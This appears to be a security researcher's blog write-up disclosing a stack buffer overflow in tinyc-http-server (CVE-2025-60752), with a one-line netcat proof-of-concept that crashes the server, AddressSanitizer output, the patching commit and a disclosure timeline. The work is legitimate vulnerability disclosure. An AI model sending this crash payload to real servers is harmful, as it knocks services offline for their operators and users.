CVE-2025-60752 | zer0matt's blog

Overview

This write-up covers the discovery of a Stack Buffer Overflow vulnerability in tinyc-http-server. The CVE-2025-60752 allows an attacker to cause a Denial of Service (Crash).

I wrote a Proof of Concept available at https://github.com/zer0matt/CVE-2025-60752

Which is actually a single bash command wrapped inside a shell script.

For more official information, see the CVE entry: CVE-2025-60752.

Confirmed vulnerable versions

Affected product: tinyc-http-server until 1f0b4e813f33788bad5e7726b71a52a37f068f3f commit

CVSS:3.1 Score

NOT YET DEFINED, THE CVE IS STILL IN RESERVED STATE. I'M WAITING FOR PUBLICATION.

Technical Analysis

Due to lack of input length controls it is possible to send a huge amount of bytes in a single request (such as a simple GET) and no proper checking is done, it just accepts the input buffer as it is.

Tested on Kali Linux 6.12.25-amd64 (Virtual Machine)

Tinyc-http-server until 1f0b4e813f33788bad5e7726b71a52a37f068f3f commit

Detailed analysis, PoC, and mitigations are covered here.

Introduction

Tinyc-http-server is a small basic HTTP server in C, compatible with both Windows and Linux

Sending a quite large amount of bytes in a single request it can lead to a Denial of Service, such as the following.

Crash analysis

Building the project with ASAN flags, so it showed memory corruption messages.

Client:

matt@kali:~$ (echo -e "GET /$(python3 -c 'print("A"*5000)') HTTP/1.1\r\nHost: localhost\r\n\r\n") | nc 0.0.0.0 8081

Server:

[2025-07-26 19:49:05] #### Welcome to tinyC! #### (Sat Jul 26 19:30:47 2025) [2025-07-26 19:49:05] Max threads: 250 [2025-07-26 19:49:05] Backlog: 250 [2025-07-26 19:49:05] Initializing server socket. [2025-07-26 19:49:05] > Running server at: 0.0.0.0:8081 ================================================================= ==191991==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffff5500068 at pc 0x7ffff7891611 bp 0x7fffffffdc10 sp 0x7fffffffd3d0 WRITE of size 10 at 0x7ffff5500068 thread T0 #0 0x7ffff7891610 in inet_ntop ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:2651 #1 0x55555555bcc5 in main tinyc-http-server/tinyc.c:157 #2 0x7ffff7633ca7 (/lib/x86_64-linux-gnu/libc.so.6+0x29ca7) (BuildId: 00775696e1aa5bebb30adbcf4d53f1c21b607fc0) #3 0x7ffff7633d64 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29d64) (BuildId: 00775696e1aa5bebb30adbcf4d53f1c21b607fc0) #4 0x5555555594a0 in _start (tinyc-http-server/tinyc+0x54a0) (BuildId: c079280610003ab91868718862c0e102cfd11b9b) Address 0x7ffff5500068 is located in stack of thread T0 at offset 104 in frame #0 0x55555555b74a in main tinyc-http-server/tinyc.c:3 This frame has 5 object(s): [48, 52) 'addrlen' (line 20) [64, 72) 'server_ip' (line 6) [96, 104) 'client_ip' (line 7) <== Memory access at offset 104 overflows this variable [128, 144) 'address' (line 19) [160, 176) 'timeout' (line 109) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:2651 in inet_ntop Shadow bytes around the buggy address: 0x7ffff54ffd80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7ffff54ffe00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7ffff54ffe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7ffff54fff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7ffff54fff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x7ffff5500000: f1 f1 f1 f1 f1 f1 04 f2 00 f2 f2 f2 00[f2]f2 f2 0x7ffff5500080: 00 00 f2 f2 00 00 f3 f3 00 00 00 00 00 00 00 00 0x7ffff5500100: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 0x7ffff5500180: f5 f5 f5 f5 00 00 00 00 00 00 00 00 00 00 00 00 0x7ffff5500200: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 0x7ffff5500280: f5 f5 f5 f5 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==191991==ABORTING [Inferior 1 (process 191991) exited with code 01]

This confirms there is a Stack buffer overflow vulnerability!

Exploit

I stopped the research to a simple Denial of Service and honestly didn't put much effort into finding another impact such as code execution or something. The exploit is limited to the shell script that you can find in my github repo.

Remediation

The vendor has officially patched the vulnerability by releasing the new version hashed with commit 1f0b4e813f33788bad5e7726b71a52a37f068f3f.

Disclosure Timeline

Discovery: 27 July 2025
Vendor Notified: 27 July 2025
Patch released: 07 September 2025
Public Disclosure: Not public yet (will update when Mitre will publish it on cve.org)
CVE Assigned: Not available yet (state: reserved)

CVE-2025-60752 – Tinyc-http-server Stack Buffer Overflow